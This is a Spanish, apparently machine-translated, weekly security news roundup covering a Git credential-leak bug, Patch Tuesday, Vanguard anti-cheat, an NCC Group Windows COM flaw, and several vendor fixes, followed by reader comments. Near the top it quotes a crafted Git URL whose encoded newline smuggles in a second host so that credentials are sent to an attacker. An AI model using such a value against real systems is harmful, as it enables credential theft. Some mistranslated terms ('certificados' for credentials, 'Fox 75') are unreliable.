Esta semana en seguridad: documentación de Git, Patch Tuesday, Anti-Cheat y Vulnerable

Fernando Román
Fernando Román

Git lanzó una actualización el martes, resolviendo un problema que podría resultar en fugas de certificados. La vulnerabilidad estaba en cómo Git maneja una URL HTTP que contiene una nueva línea. Al observar los hechos en 2.26.1, podemos encontrar un ejemplo de un ataque:
url = "https://one.example.com?%0ahost=two.example.com/foo.git"

Haciéndolo git pull contra este repositorio conectará tu instancia de git al servidor del atacante, pero usando los certificados de servidor arbitrarios. Parece que esto podría usarse para robar certificados de Github, por ejemplo. Así que asegúrese de tener un cliente Git actualizado.

VPN comercial y código abierto

Los proveedores de VPN comerciales son pocos y distantes entre sí, y no todos son bien conocidos. En lugar de informar sobre los malos actores, hoy miramos a un proveedor que está haciendo algo bien. IVPN ha abierto su aplicación de cliente y ha pasado por el proceso necesario para alojar su cliente de Android en F-Droid. F-Droid, por cierto, es solo tiendas de aplicaciones de terceros de código abierto para Android. (Consulte mi entrevista semanal de FLOSS para obtener más información).

IVPN incluso planea abrir su programa de servidor de código abierto. Tener una pila de código completamente abierto no garantiza absolutamente el buen comportamiento de un proveedor, ayuda mucho a demostrar buenas intenciones y compra mucha buena voluntad de la comunidad.

Labor de retazos

¿Recuerdas los días de Windows 0 de los que hablamos en las últimas semanas? Finalmente ha llegado un martes irregular y finalmente se están solucionando tres errores explotados activamente. Dos de esas deficiencias fueron las RCE en las DLL utilizadas para editar fuentes, y la tercera falla de escalado privilegiado local en el kernel de Windows.

Otro error importante en Internet Explorer también se solucionó esta semana: CVE-2020-0968. Este es un error de ejecución remota que puede activarse simplemente visitando una página maliciosa. En algunos lugares, esto se llama día 0, pero Microsoft afirma que no ha encontrado evidencia de que se explote en la naturaleza.

La última noticia relacionada es el investigador de seguridad conocido como [SandboxEscaper] ahora trabaja en Microsoft, y es responsable de algunos de los errores corregidos en los últimos meses.

Anti-tramposo

Riot Games ha lanzado un nuevo sistema anti-trampas, Vanguard, para su juego recientemente lanzado, Valorant. Vanguard aparentemente atrae algo de atención, ya que instala un controlador de nivel central como parte de las medidas contra el engaño. En un nivel, es comprensible que una solución antifraude verdaderamente sólida necesite algo más que un enfoque de sistema a nivel de usuario. Al mismo tiempo, la vulnerabilidad en ese controlador significa que todo el sistema está expuesto, sin mencionar la posibilidad de mala conducta intencional.

Se podría afirmar que las otras soluciones anti-engaño ubicuas como BattlEye y EAC también usan controladores centrales para funcionar. (Y como resultado, hubo un gran obstáculo para lanzar juegos en Linux a través de Wine). No pude confirmar esto, pero se dice que Vanguard se diferencia en que siempre está cargado, en lugar de solo cargarse mientras el juego está en ejecución. Un problema curioso es que los programas antivirus tienden a marcar los programas contra el engaño como aplicaciones maliciosas.

Documentación de Windows y COM de Windows

Esta vulnerabilidad no es particularmente terrible y ha existido durante algunos meses, pero la edición se acaba de publicar y tiene un giro realmente interesante. Primero, el Modelo de objetos componentes (COM) de Windows es básicamente solo una parte de la API de Windows. (Sé que eso no es del todo técnicamente correcto, pero es una simplificación útil para nuestros propósitos). [Phillip Langlois] y [Edward Torkington] por nccgroup descubrió una falla en la interfaz COM relacionada con las instalaciones de software. Al crear un enlace de símbolo y luego llamar a la interfaz vulnerable, un usuario pobre podría engañar al sistema para que cree una copia legible de cualquier archivo en el sistema.

Como era de esperar, Microsoft respondió y lanzó un parche para resolver el problema en 90 días. Hacer una revisión de los parches de ventas siempre es una buena idea, y se notó algo extraño: ¡el exploit original todavía funcionaba en una máquina de parcheo! Después de un poco de descompilación y doble verificación, el culpable resultó ser una función de Windows, “GetFileAttributesW”. Una revisión rápida de la documentación de MSDN muestra que cuando se trata de simulación, esta función devuelve información sobre el enlace en lugar del destino. En la práctica, sin embargo, la función siguió el enlace e informó sobre el archivo de destino.

La documentación es muy importante para realizar un seguimiento de los problemas de seguridad, y una documentación incorrecta puede causar todo tipo de dolores de cabeza como este. Esto también resalta la importancia de la doble verificación a través de la ejecución efectiva del código, en lugar de depender solo de su comprensión del problema. Y, por último, si informa que se ha solucionado una vulnerabilidad de seguridad, asegúrese de volver a examinar el problema para asegurarse de que realmente se haya reparado.

Probabilidades y fines

Se envió aleatoriamente una imagen de un enrutador virtual Juniper con credenciales de nivel raíz. Si bien eso es obviamente un problema, esto no es tan malo como algunas de las historias anteriores que hemos cubierto. Primero, esta no es una contraseña oculta o inmutable, y es recomendable establecer la contraseña de root durante la configuración inicial. La otra diferencia es que los propios investigadores de Juniper encontraron este problema y lo solucionaron sin ningún abuso salvaje. Por otro lado, estos certificados están presentes en Juniper VM durante 3 años.

Se lanzó Fox 75, con otro conjunto de errores corregidos. Ninguno de ellos se ha encontrado en la naturaleza, pero algunos errores se consideran altamente efectivos y probablemente explotables. También se ha realizado una nueva versión de Firefox ESR, que corrige algunos de los mismos errores. Esta actualización desencadenó una actualización de Tails y una actualización del navegador Tor.

Google Chrome finalmente hizo su próxima versión, saltando a Chrome 81. Este contiene 32 correcciones de seguridad, con algunas de ellas de gran importancia.

La siguiente entrada en “No conecte su interfaz de administración a Internet” proviene de Dell, ya que su iDRAC (controlador de acceso remoto integrado de Dell) se actualizó recientemente para reparar daños desagradables por desbordamiento del búfer. Este defecto es accesible sin autenticación y probablemente podría usarse para hacer cumplir un código arbitrario.

Zoom simplemente no puede detenerse porque la última palabra es que se han encontrado un par de exploits, uno de los cuales está a la venta por $ 500,000. Este exploit es RCE completo para Windows, mientras que el otro es menos útil solo para Mac.

  • Sr. Nada dice:

    Tengo la teoría de que los desarrolladores de juegos se llevan bien con los desarrolladores engañosos. Ciertamente, el martillo de la prohibición cae de vez en cuando, pero estoy seguro de que si disparara un control de 5 o 6 dígitos a una empresa de juegos, simplemente pasarían la información para escribir un programa engañoso. y eso supone que son entidades diferentes.

    • jpa dice:

      Teniendo en cuenta que Riot Games gana miles de millones de dólares al año, es posible que solo seis cifras no les interesen. Los trucos tienen un costo real de que otros jugadores juegan menos. Por supuesto, las propias empresas de juegos de azar venden trampas, pero eso se llama pago para ganar.

      • Sr. Nada dice:

        Además, veo un problema con los juegos f2p de bajo presupuesto. una vez le dan mucha importancia a las prohibiciones masivas y nunca volverá a suceder. solo parece sospechoso.

    • RW versión 0.0.1 dice:

      Yo pensaría que al menos algunos de los trucos se vinculan a un código de trucos insertado por los programadores del juego para usarlo para desarrollar pruebas, y desde allí disfrazado o deshabilitado de manera inadecuada. Por lo tanto, algunos de los trucos pueden basarse en información dejada o transmitida intencionalmente por codificadores.

    • Dan dice:

      Muy improbable. Casi ningún incentivo para ello; el mercado de los buenos juegos es bastante más grande que el mercado de las trampas, y los jugadores reaccionan de forma muy negativa a las trampas.

  • kriptilomese dice:

    Anti-trampas es un juego del gato y el ratón. Hacer del mecanismo antifraude un módulo central significa que ese sistema local debe tener “integridad”. Sin embargo, podría operar ese sistema local como una máquina virtual y realizar cualquier modificación al sistema “local” en vivo fuera (del nivel hipervisor) a voluntad. ¡Realmente son tortugas hasta el final!

  • RW versión 0.0.1 dice:

    Las interfaces de administración de Dell similares, etc. se han vuelto bastante poderosas, pero alguna de ellas se ha integrado alguna vez con Escritorio remoto para que esto …
    https://itstillworks.com/update-bios-settings-remotely-7459650.html

    .. ¿alguna vez has tenido la esperanza de trabajar en algo? porque me suena a una completa tontería.

  • Mis012 dice:

    deberíamos hacer un truco con una cámara apuntando a la pantalla y servicios moviendo el mouse y presionando teclas frente a estas empresas GTFO y dejar de ignorar Linux “porque no nos dejan cargar nuestra mierda en el kernel” …
    Windows y las cosas que no pertenecen a un kernel son una causa perdida

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *